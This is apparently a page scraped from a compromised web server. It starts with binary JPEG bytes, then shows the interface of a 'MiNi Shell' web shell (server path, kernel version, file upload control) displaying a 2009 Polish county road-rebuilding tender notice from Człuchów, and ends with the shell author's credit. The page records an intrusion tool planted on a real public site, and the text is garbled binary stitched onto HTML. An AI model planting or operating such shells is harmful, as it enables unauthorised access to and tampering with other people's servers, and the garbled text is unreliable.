JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090216/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090216/29436-N-2009.html

<p class="kh_header"><b>Człuchów: Przebudowa trasy Koczała - Łękinia - Miłocice - DK nr 20 w ciągu dróg powiatowych nr 2502G, 2503G i 1742G</b><br>
<b>Numer ogłoszenia: 29436 - 2009; data zamieszczenia: 16.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Człuchowski , ul. Wojska Polskiego 1, 77-300 Człuchów, woj. pomorskie, tel. 059 8342539, 8343461 do 463, faks 059 8342539.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.starostwo.czluchow.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa trasy Koczała - Łękinia - Miłocice - DK nr 20 w ciągu dróg powiatowych nr 2502G, 2503G i 1742G.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przebudowa trasy Koczała - Łękinia - Miłocice -DK nr 20 w ciągu dróg powiatowych: 2502G, 2503G i 1742G. Odcinek przewidziany do modernizacji w ciągu dróg powiatowych nr 2503G i 1742G o łącznej długości 5437 m ma niewystarczającą szerokość jezdni wynoszącą 5 m. Przebudowa drogi polega na poszerzeniu jezdni do szerokości 6 m w m. Koczała oraz do 5,5 m poza obszarem zabudowanym. Konstrukcję poszerzeń stanowi podbudowa pomocnicza z kruszywa łamanego stabilizowanego mechanicznie gr. 20 cm i podbudowa zasadnicza z betonu asfalt. gr. 5 cm. Na istniejącej nawierzchni zostanie wykonane wyrównanie masą z betonu asfalt. o gr. zmiennej wynikającej z przekroju poprzecznego (min. 3 cm). Na całej szerokości jezdni ułożona będzie warstwa ścieralna z betonu asfalt. gr. 4 cm. Na odcinku o dł. 4,2 km ze słabą podbudową z gruntu stabilizowanego cementem przewiduje się dodatkowo ułożenie warstwy wiążącej o gr. 5 cm przed warstwą ścieralną. Połączenie starej konstrukcji z poszerzeniem zostanie wzmocnione siatką przeciwspękaniową. Na odcinku od km 1+969 do km 3+529 ułożona będzie nawierzchnia SMA gr. 2,5 cm po wcześniejszym wyrównaniu mieszanką mineralno-asfaltową.
Odcinek drogi 2502G (ul. Spacerowej w Koczale), stanowiący dojazd do skrzyżowania z drogą 2503G ma długość 308 m i zniszczoną nawierzchnię bitumiczną o szer. 6 m. Po wcześniejszym wyrównaniu podłoża zostanie ułożona warstwa ścieralna gr. 4 cm. Zakres robót na tym odcinku obejmuje również budowę zatoki i pętli autobusowej oraz budowę chodników z kostki betonowej.
Wybór rozwiązań technologicznych został dokonany na podstawie wymagań dla dróg klasy L (lokalne) zgodnie z rozporządzeniem MTiGM z dnia 2 marca 1999 r. w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie. Projektowana konstrukcja spełnia wymagania dla kategorii ruchu KR2. 
Zakres ważniejszych robót budowlanych:
Podbudowa z kruszywa łamanego stabilizowanego mech.
- grubości 20 cm		- 4 098 m2
- grubości 15 cm		-    183 m2
Podbudowa zasadnicza z betonu asfalt. gr. 5 cm	- 3 886 m2
Wyrównanie istniejącej jezdni betonem asfaltowym	- 5 915 Mg	
Warstwa wiążąca z betonu asfaltowego 
- grubości 5 cm	-14 976 m2
- grubości 4 cm 	-     400 m2
Nawierzchnia:
- jezdni - warstwa ścieralna z betonu asfalt. gr. 4 cm		- 32 128 m2
- poboczy z kruszywa naturalnego gr. 15 cm			- 10 374 m2
- z kostki kamiennej (zabruki)		-      183 m2
- jezdni SMA gr. 2,5 cm			-   7 300 m2 
Chodniki z kostki brukowej betonowej:
- nowe		-      290 m2
- do przełożenia	-      678 m2	
Zjazdy z drogi 
- z betonu asfaltowego	-   1 691 m2
- z kostki brukowej betonowej	-        48 m2
Zatoka autobusowa z kostki na podbudowie z kruszywa łam. -      113 m2
Pętla autobusowa z kostki bet. na podbudowie bet.		-      292 m2
Znaki pionowe		-        49 szt.
Oznakowanie poziome	-      112 m2
Poręcze bariery ochronne stalowe	-      166 m	
Zamówienie obejmuje wykonanie robót, zgodnie z projektem budowlanym stanowiącym Załącznik Nr 8 do SIWZ oraz specyfikacjami technicznymi wykonania i odbioru robót budowlanych, stanowiących Załącznik Nr 9 do SIWZ w oparciu o przedmiar robót stanowiący Załącznik Nr 7 do SIWZ. 
Dokumentacja techniczna jest chroniona prawem autorskim i nie może być wykorzystana w innym celu niż przygotowanie oferty w niniejszym postępowaniu.
Dokumentacja projektowa w formie papierowej zostanie udostępniona wykonawcom odpłatnie na ich pisemny wniosek, wg stawek za kserowanie i powielanie dokumentów określonych Uchwałą Zarządu Powiatu Człuchowskiego.
Wykonawca zaakceptuje termin płatności wynoszący do 30 dni od daty otrzymania prawidłowo wypełnionej faktury.
Wykonawca udzieli gwarancji na wykonane roboty na minimum 36 miesięcy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.23.00.00-8, 45.23.30.00-9, 45.23.24.51-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium wynosi 100.000,00 zł.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu o udzielenie niniejszego zamówienia mogą ubiegać się wykonawcy, którzy:
1.	posiadają uprawnienia do wykonania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień:
a)	posiadają aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
2.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych przedmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, tj:
a)	wykażą, że w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali co najmniej 2 roboty w branży drogowej, odpowiadające swoim rodzajem przedmiotowi zamówienia, o wartości nie mniejszej niż 4.300.000,00 zł netto każda.
b)	dysponują osobami zdolnymi do wykonania zamówienia, w szczególności osobami uprawnionymi do sprawowania samodzielnych funkcji technicznych w budownictwie w branży drogowej i są członkami właściwej izby samorządu zawodowego.
c)	dysponują wytwórnią mieszanki mineralno-bitumicznej (otaczarka) o wydajności min. 100 Mg/godz. wyposażoną w urządzenia automatycznego sterowania. Wymaga się, aby dozowanie składników, w tym także wstępne, było wagowe, zautomatyzowane i sterowane elektronicznie. Wytwórnia winna być zlokalizowana w odległości umożliwiającej dowóz mieszanki na plac budowy zgodnie z warunkami Specyfikacji Technicznych, tzn. czas transportu masy mineralno-bitumicznej na budowę (od załadunku do rozładunku) nie może przekroczyć 2 godzin z jednoczesnym spełnieniem warunku zachowania wymaganych właściwości i wymaganej temperatury przy wbudowywaniu. Zamawiający zastrzega sobie możliwość na etapie oceny ofert komisyjnego sprawdzenia spełnienia funkcji czasu mieszanki mineralno-biumicznej;
3.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

Zamawiający dokona oceny spełniania warunków na podstawie załączonych do oferty oświadczeń i dokumentów, przy zastosowaniu formuły: spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Dla potwierdzenia spełnienia warunków udziału w postępowaniu, wykonawcy winni przedłożyć niżej wymienione dokumenty:
a)	Oświadczenie na formularzu stanowiącym Załącznik Nr 2 do SIWZ o spełnianiu wymagań z art. 22 ust. 1 oraz że nie podlegają wykluczeniu na podstawie art. 24 ustawy.
b)	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają  wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2.	Dla potwierdzenia spełniania warunków, opisanych w rozdziale VI pkt SIWZ, wykonawcy winni przedłożyć następujące dokumenty:
a)	Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności - wg wzoru stanowiącego Załącznik Nr 3 do SIWZ. Do wypełnionego druku Wykaz osób należy załączyć uprawnienia i zaświadczenia o przynależności do właściwej izby samorządu zawodowego. W przypadku, gdy wykonawca wskaże w wykazie osoby, którymi będzie dysponował, musi załączyć pisemne zobowiązanie innych podmiotów do udostępnienia tych osób.
b)	Wypełniony Wykaz wykonanych robót budowlanych w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia (minimum 2 roboty drogowe o porównywalnym zakresie), stanowiący Załącznik Nr 4 do SIWZ, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie. Spełnieniem warunku będzie przedstawienie wykonania robót tego rodzaju o wartości nie mniejszej niż 4.300.000,00 zł. netto każda.
c)	Wypełniony Wykaz narzędzi i urządzeń , którymi dysponuje lub będzie dysponował wykonawca wymaganych do realizacji przedmiotu zamówienia, zgodny z treścią Załącznika nr 5. Wykaz musi potwierdzać spełnienie warunku, o którym mowa w rozdziale VI pkt 2 lit c). W przypadku, gdy wykonawca wskaże w wykazie narzędzia i urządzenia, którymi będzie dysponował, musi załączyć pisemne zobowiązanie innych podmiotów do udostępnienia tych narzędzi i urządzeń.3.	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, stosuje się do przepisów § 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 87, poz. 605 z późn. zm.).
4.	Dokument, o których mowa w pkt 3 powinien być wystawiony nie wcześniej niż odpowiadający im dokument określony w pkt 1 lit. b).
5.	Dokumenty i oświadczenia wymagane dla potwierdzenia spełnienia przez Wykonawców warunków udziału w postępowaniu winny być składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę. Poświadczenie za zgodność z oryginałem winno być sporządzone w sposób umożliwiający identyfikację podpisu (np. wraz z imienna pieczątka osoby poświadczającej kopie dokumentu za zgodność z oryginałem). Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski poświadczonym przez wykonawcę.
6.	W celu potwierdzenia spełnienia warunków wymaganych od wykonawców wspólnie ubiegających się o udzielenie zamówienia:
a)	Oświadczenie wymienione w pkt 1 lit a) powinno być złożone w imieniu wszystkich wykonawców.
b)	Dokument wymieniony w pkt 1 lit b) albo odpowiadający mu określony w pkt 3, winien być złożony przez każdego wykonawcę.
c)	Dokumenty wymienione w pkt 2 mogą dotyczyć dowolnego spośród wykonawców składających wspólną ofertę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.starostwo.czluchow.org.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Wdrożeń i Usług Technicznych przy Starostwie Powiatowym w Człuchowie 77-300 Człuchów ul. Wojska Polskiego 1 pok. 14.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.03.2009 godzina 11:55, miejsce: Starostwo Powiatowe w Człuchowie 77-300 Człuchów ul. Wojska Polskiego 1.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com